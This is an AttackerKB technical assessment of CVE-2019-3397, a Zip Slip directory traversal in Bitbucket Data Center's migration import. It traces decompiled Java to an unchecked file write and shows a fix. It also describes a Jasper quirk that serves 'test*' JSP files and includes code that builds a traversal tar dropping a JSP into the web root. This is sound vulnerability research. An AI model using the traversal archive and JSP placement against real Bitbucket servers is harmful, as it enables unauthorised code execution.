AttackerKB: AKB:081C8769-2C70-49C4-B371-ACDEBC3B400A

Atlassian Bitbucket Data Center Migration Tool Directory Traversal Vulnerability

2019-06-03 00:00:00
attackerkb.com

EPSS: 0.004 (Low), Percentile: 75.0%


Recent assessments:

wchen-r7 at September 12, 2019 6:06pm UTC reported:

CVE-2019-3397: Atlassian Bitbucket Data Center Migration Tool Directory Traversal Vulnerability

Introduction

Bitbucket Data Center is the on-premises Git repository management solution for larger enterprises that require high availability and performance at scale. It uses a cluster of Bitbucket Server nodes and is deployed in your own data center.

A vulnerability was found in the Data Center’s migration tool. If a maliciously crafted archive is placed on the Bitbucket server, a remote user with administrative permissions could import it for data migration, allowing extracted files to be written to arbitrary locations and potentially resulting in remote code execution.

Please note that this vulnerability is treated as local (a file format bug) rather than remote, because Bitbucket does not allow archives to be uploaded remotely. More details below.

Affected versions:

  • 5.13.0 <= version < 5.13.6

  • 5.14.0 <= version < 5.14.4

  • 5.15.0 <= version < 5.15.3

  • 5.16.0 <= version < 5.16.3

  • 6.0.0 <= version < 6.0.3

  • 6.1.0 <= version < 6.1.2

Technical Analysis

Originally, this vulnerability research was influenced by a more generic research effort codenamed Zip Slip, conducted by the Snyk security team in 2018. The Zip Slip research concluded that archive extraction can be dangerous due to potential arbitrary file overwrites, a risk that is often overlooked by applications. Building on Zip Slip, RIPS’ code analysis engine managed to find a similar issue in Bitbucket’s migration tool, which was later recognized as CVE-2019-3397.
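
To illustrate the class of bug Zip Slip describes, here is a minimal, self-contained Java sketch (not Bitbucket code; the directory and entry name are made up) showing how a hostile entry name escapes the extraction directory, along with the canonical guard this pattern calls for:

import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class ZipSlipDemo {
  public static void main(String[] args) throws IOException {
    // Hypothetical extraction directory.
    Path extractDir = Paths.get("/safe/extract/dir");

    // Attacker-controlled entry name taken from the archive.
    String entryName = "../../../tmp/evil.jsp";

    // Naive extraction: resolve() happily walks out of extractDir.
    Path target = extractDir.resolve(entryName).normalize();
    System.out.println(target); // prints /tmp/evil.jsp

    // The canonical Zip Slip guard: reject entries that escape.
    if (!target.startsWith(extractDir)) {
      throw new IOException("Entry escapes extraction dir: " + entryName);
    }
  }
}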

REST API for Archive Import

Knowing that backstory, we are specifically looking for any Java code or API documentation in Bitbucket associated with things such as archive processing (particularly extraction), data importing, etc. According to the Data Center Migration documentation, importing is a feature exposed as a REST API, and can be used this way with curl:

curl -s -n -X POST -H 'Content-type: application/json' -d '{"archivePath":"Bitbucket_export_422.tar"}' http://localhost:7990/bitbucket/rest/api/1.0/migration/imports | jq .
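
For illustration, the same request can be issued from Java 11’s built-in HTTP client. The endpoint and JSON body come straight from the documentation; the host and admin credentials below are placeholders:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class StartImport {
  public static void main(String[] args) throws Exception {
    // Placeholder admin credentials; the import API requires admin rights.
    String auth = Base64.getEncoder()
        .encodeToString("admin:password".getBytes(StandardCharsets.UTF_8));
    HttpRequest request = HttpRequest.newBuilder()
        .uri(URI.create("http://localhost:7990/bitbucket/rest/api/1.0/migration/imports"))
        .header("Content-Type", "application/json")
        .header("Authorization", "Basic " + auth)
        .POST(HttpRequest.BodyPublishers.ofString("{\"archivePath\":\"Bitbucket_export_422.tar\"}"))
        .build();
    HttpResponse<String> response = HttpClient.newHttpClient()
        .send(request, HttpResponse.BodyHandlers.ofString());
    System.out.println(response.statusCode() + "\n" + response.body());
  }
}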

The documentation is also very clear that the tar file is expected to be found under the following path:

$BITBUCKET_HOME/shared/data/migration/import

In my installation, this is actually:

/var/atlassian/application-data/bitbucket/shared/data/migration/import

Since the feature is part of the REST API, we can quickly do a search and find these:

$ find . -name '*rest*.jar'
./app/WEB-INF/lib/crowd-integration-client-rest-3.3.3-platform5-jdk11-m02.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-rest-ui-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-git-rest-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/atlassian-rest-module-6.0.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-rest-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/bitbucket-ref-restriction-6.1.0.jar
./app/WEB-INF/atlassian-bundled-plugins/atlassian-plugins-webresource-rest-4.0.3.jar
./elasticsearch/modules/reindex/elasticsearch-rest-client-6.5.3.jar

The file bitbucket-rest-6.1.0.jar seems to be the most direct match, so that’s where we start. By decompiling the file and searching for the archivePath string, we found this Java constructor:

@JsonSerialize
public class RestImportRequest extends RestMapEntity {
  // ... some code here ...

  public RestImportRequest(String archivePath) {
    put("archivePath", archivePath);
  }
  
  // ... more code here ...
}

That finding indicates that we’re looking at the right JAR file. Looking a bit further, we also found this code:

public class MigrationResource extends RestResource {
  // ... some code ...
  @POST
  @Path("/imports")
  public Response startImport(RestImportRequest request) {
    ValidationUtils.validate(this.validator, request, new Class[0]);

    Job exportJob = this.migrationService.startImport(toImportRequest(request));

    return ResponseFactory.ok(new RestJob(exportJob)).build();
  }

  // ... more code ...
}

This block of code handles the /imports path; notice the following call:

this.migrationService.startImport

this.migrationService is declared as follows, which tells us we should be looking at the MigrationService implementation next:

private final MigrationService migrationService;

The MigrationService interface can be found in the bitbucket-api-6.1.0.jar file, but the actual implementation is found in bitbucket-service-impl-6.1.0.jar. In the latter, the startImport function is declared as follows, which indicates that the vulnerability not only requires authentication, it requires admin access:

@Nonnull
@PreAuthorize("hasGlobalPermission('ADMIN')")
public Job startImport(@Nonnull ImportRequest request)

About halfway through startImport is where the import process begins, and this block of code is particularly interesting to us:

// ... some code ...
try (FileChannel channel = FileChannel.open(importPath, new OpenOption[] { StandardOpenOption.READ });
     InputStream inputStream = Channels.newInputStream(channel);
     TarArchiveSource source = new TarArchiveSource(inputStream, importPath)) {
  context = new DefaultImportContext(source, this.i18nService, importJob, getPercentageSupplier(channel.size(), channel), this.userImportService);
  this.activeImports.put(Long.valueOf(importJob.getId()), context);
  try {
    this.importService.importRepositories(context);
// ... more code ...

In the above code, we can see that a file channel is created to load the archive as an input stream, which backs a TarArchiveSource instance. That source is used to set up a DefaultImportContext, and the context is then passed to a function called importRepositories (from the ImportService class).

In the importRepositories function, we see the beginning of tar extraction:

context.iterateEntries(entrySource -> {
  Path path = entrySource.getPath();

  Path namespace = path.getName(0);
  Path relativePath = namespace.relativize(path);
  if (MigrationPaths.INTERNAL_PREFIX.equals(namespace)) {
    handleInternalPath(context, importerMapping, relativePath);
  } else {
    handleImporterPath(context, importerMapping, relativePath, entrySource, namespace);
  } 
});
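
To make the namespace handling concrete, here is a standalone demonstration of what getName(0) and relativize do; the entry path is hypothetical, purely for illustration:

import java.nio.file.Path;
import java.nio.file.Paths;

public class NamespaceSplitDemo {
  public static void main(String[] args) {
    // Hypothetical archive entry path, for illustration only.
    Path path = Paths.get("repositories/1/attachments/hello.txt");

    Path namespace = path.getName(0);               // repositories
    Path relativePath = namespace.relativize(path); // 1/attachments/hello.txt

    System.out.println(namespace);
    System.out.println(relativePath);
  }
}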

Exactly how the entry is handled depends on this condition:

MigrationPaths.INTERNAL_PREFIX.equals(namespace)

In most cases, however, we will hit this function call:

handleImporterPath(context, importerMapping, relativePath, entrySource, namespace);

The most important part of handleImporterPath is this:

public class DefaultImportService extends AbstractService implements ImportService {
  // ... code ...
  private void handleImporterPath(InternalImportContext context, Map<Path, ErrorHandlingDataImporter> importerMapping, Path relativePath, EntrySource entrySource, Path namespace) throws IOException {
    // ... code ...
    if (tarArchive.matches(localPath)) {

      String name = localPath.getFileName().toString();
      name = name.substring(0, name.length() - ".atl.tar".length());
      localPath = localPath.resolveSibling(name);

      importer.importArchiveEntry(new TarArchiveSource(inputStream, localPath));
    } else {
      importer.importEntry(new DefaultEntrySource(inputStream, localPath));
    } 
    // ... code ...
  }
}

Although there is a condition that determines whether the function calls importArchiveEntry or importEntry, the distinction isn’t a huge deal, because both are structured the same way around a delegate callback. For example, this is importArchiveEntry, which invokes onArchiveEntry:

void importArchiveEntry(ArchiveSource archiveSource) {
  try {
    this.delegate.onArchiveEntry(this.context, archiveSource);
  } catch (Exception e) {
    addCallbackErrorFor(e, "onArchiveEntry", new Object[0]);
    if (e instanceof FatalImportException) {
      throw e;
    }
  } 
}

Archive Extraction

The onArchiveEntry callback comes from the RepositoryAttachmentsImporter class. There is a lot of code in this function, but the most interesting portion is this:

public void onArchiveEntry(@Nonnull ImportContext importContext, @Nonnull ArchiveSource archiveSource) {
  // ... code ...
  Path target = this.storageService.getAttachmentsDir(repo);
  try {
    Files.createDirectories(target, new java.nio.file.attribute.FileAttribute[0]);
    // ... code ...
    archiveSource.extractToDisk(target);
    // ... code ...

The extractToDisk function above comes from TarEntrySource, where the super.extractToDisk call is what matters most:

private static class TarEntrySource extends DefaultEntrySource {
  // ... code ...
  public void extractToDisk(@Nonnull Path target) throws IOException {
    super.extractToDisk(target);
    // ... code ...
  }
}

As you can see, most of extractToDisk is implemented in the parent class, DefaultEntrySource. Looking there, this is clearly the code responsible for writing our file to disk:

public class DefaultEntrySource implements EntrySource {
  // ... code ...

  public void extractToDisk(@Nonnull Path target) throws IOException {
    Objects.requireNonNull(target, "target");
    
    guardAgainstRepeatedCalls();
    Files.createDirectories(target.getParent(), new java.nio.file.attribute.FileAttribute[0]);
    try (OutputStream out = new FileOutputStream(target.toFile())) {
      IoUtils.copy(this.inputStream, out, 32768);
    } 
  }
}
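
Note what is missing here: target is ultimately derived from the attacker-controlled entry path, yet nothing verifies that it stays inside the intended directory before the FileOutputStream is opened. A guard of the following shape would stop the traversal; this is an illustrative sketch with a made-up base directory, not Atlassian’s actual patch:

import java.io.IOException;
import java.nio.file.Path;
import java.nio.file.Paths;

public class SafeTargetDemo {
  // The kind of check DefaultEntrySource.extractToDisk lacks.
  static Path checkedTarget(Path baseDir, Path entryPath) throws IOException {
    Path base = baseDir.toAbsolutePath().normalize();
    Path resolved = base.resolve(entryPath).normalize();
    if (!resolved.startsWith(base)) {
      throw new IOException("Entry escapes " + base + ": " + entryPath);
    }
    return resolved;
  }

  public static void main(String[] args) throws IOException {
    Path base = Paths.get("/data/attachments"); // hypothetical attachments dir
    System.out.println(checkedTarget(base, Paths.get("repo1/hello.txt"))); // fine
    checkedTarget(base, Paths.get("../../tmp/evil.jsp")); // throws IOException
  }
}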

Possible Remote Code Execution

1st Requirement: Ability to Upload

Typically, an archive extraction bug in a web application would be a remote vulnerability, but that does not seem to be the case for Bitbucket, because there is no legitimate way to upload your TAR file to it.

One possible way I have found is that Bitbucket allows you to create a new storage path in the admin interface, so if you could somehow mount a share, you could make it load the malicious archive remotely and trigger the extraction. For automated exploitation, however, this is probably impractical, since mounting implies code execution already.

As an attacker, you would need to figure out how to get the malicious archive onto the server, and that is beyond the scope of the CVE.

2nd Requirement: Payload Placement

The second requirement for code execution is that the archive needs to embed a JSP payload written to a location that a GET request could reach. Since the archive has direct control of FileOutputStream, this seems possible at first glance, but this is where things get a little more interesting.

We know that Bitbucket is based on Apache Tomcat, so the Jasper component would be handling JSP files. In theory, we should be able to place a JSP file in the following directory and make the server load it:

/opt/atlassian/bitbucket/6.1.0/app

Also, if a JSP file is loaded, the “cached” version should be found in:

/var/atlassian/application-data/bitbucket/tmp/tomcat.5664249735078236529.7990/work/Tomcat/localhost/ROOT/org/apache/jsp/

However, what actually happens is that if you just write a file there, Bitbucket doesn’t seem to want to load it at all, and you will just get a 404 Not Found when you request it.

For this to work, the secret is to name your JSP file so that it starts with “test”. As an experiment, save your JSP file in the app folder like this:

echo Hello World > test01.jsp

Then request it with curl; you should get:

$ curl -v http://172.16.135.158:7990/test01.jsp
*   Trying 172.16.135.158...
* TCP_NODELAY set
* Connected to 172.16.135.158 (172.16.135.158) port 7990 (#0)
> GET /test01.jsp HTTP/1.1
> Host: 172.16.135.158:7990
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 200
< X-AREQUESTID: @L2C5R0x973x867x0
< X-ASEN: SEN-L14114184
< x-xss-protection: 1; mode=block
< x-frame-options: SAMEORIGIN
< x-content-type-options: nosniff
< Set-Cookie: BITBUCKETSESSIONID=E1E422B7BCAE9A96C452C629623207E7; Path=/; HttpOnly
< vary: accept-encoding
< Content-Type: text/html
< Transfer-Encoding: chunked
< Date: Wed, 28 Aug 2019 21:13:36 GMT
<
Hello World

Double-check the cache folder; you should find your JSP file compiled as:

test01_jsp.class
test01_jsp.java

Looking around the web, this does not appear to be the desired behavior. In fact, while poking at Bitbucket, there doesn’t even seem to be any documentation on how to modify the Jasper configuration, so this is likely a bug.
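
Putting the two requirements together, the sketch below shows how such an archive could be assembled with the Apache Commons Compress library. Everything attack-specific is an assumption for illustration: the traversal depth, the target path, and the payload. In particular, the real importer expects a namespace layout in the entry path that is not reproduced here, so this only demonstrates the traversal primitive, not a working exploit:

import java.io.FileOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

import org.apache.commons.compress.archivers.tar.TarArchiveEntry;
import org.apache.commons.compress.archivers.tar.TarArchiveOutputStream;

public class EvilTarBuilder {
  public static void main(String[] args) throws IOException {
    // The "test" prefix matters because of the Jasper quirk described above.
    byte[] jsp = "<%= \"Hello World\" %>".getBytes(StandardCharsets.UTF_8);

    // Hypothetical traversal: walk out of the extraction directory into the
    // Tomcat application root. The depth depends on the deployment layout.
    String name = "../../../../../../opt/atlassian/bitbucket/6.1.0/app/test01.jsp";

    try (TarArchiveOutputStream tar =
        new TarArchiveOutputStream(new FileOutputStream("Bitbucket_export_evil.tar"))) {
      TarArchiveEntry entry = new TarArchiveEntry(name);
      entry.setSize(jsp.length);
      tar.putArchiveEntry(entry);
      tar.write(jsp);
      tar.closeArchiveEntry();
    }
  }
}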

Assessed Attacker Value: 0
